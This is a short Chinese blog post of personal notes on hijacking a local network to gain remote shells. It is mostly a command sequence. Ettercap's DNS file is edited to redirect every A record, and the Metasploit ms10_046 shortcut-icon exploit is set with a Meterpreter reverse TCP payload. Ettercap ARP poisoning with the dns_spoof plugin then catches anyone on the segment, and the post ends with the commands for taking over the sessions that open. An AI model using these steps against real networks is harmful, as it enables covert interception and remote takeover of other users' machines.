[笔记]Metasploit内网/局域网劫持

WEB安全   DYBOY  14335 2018-6-15 

标签: getshell 提权 内网渗透

Metasploit内网劫持的笔记

内网渗透劫持DNS拿到cmdshell,如下步骤:

ifconfig   //获取IP及网卡信息

leafpad /etc/ettercap/etter.dns   //打开文件 插入* A 记录 预设IP
service apache2 start   //启动本机apache服务 此次不用启动,使用ms10_046会自动启动
//* A ip 劫持所有A记录
//*.com A ip 劫持

msfconsole     //启动msf
search ms10_046   //搜索ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader   //设置模块
set payload windows/meterpreter/reverse_tcp
set lhost ifconfig的ip(本机ip或预设IP)   //监听
set servhost ifconfig的ip(本机ip或预设IP)
exploit    //执行

ettercap -T -q -i eth0 -P dns_spoof -M arp /// ///    //劫持 -i 网卡 -P 插件 ///分别代表 任意IP 任意地址
此时同意网段内用户访问网站时会 劫持 并与本机建立会话
目标机器上线后 jobs 
sessions -l
session -i 1
上一篇
PHP复杂变量绕过addslashes()直接拿shell
下一篇
[笔记]MetaSploit之弹个shell

版权声明:《 [笔记]Metasploit内网/局域网劫持 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-6-15 14:06:43

相关推荐

5631人看过

MSSQL备份提权

10952人看过

VIM不正常退出产生的swp文件将泄漏敏感信息

5946人看过

[内网渗透]LCX的蒂花之秀

14323人看过

聊聊安全测试中如何快速搞定Webshell

16769人看过

[渗透测试]Redis未授权访问漏洞利用

发表评论 / Comment

用心评论~


Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23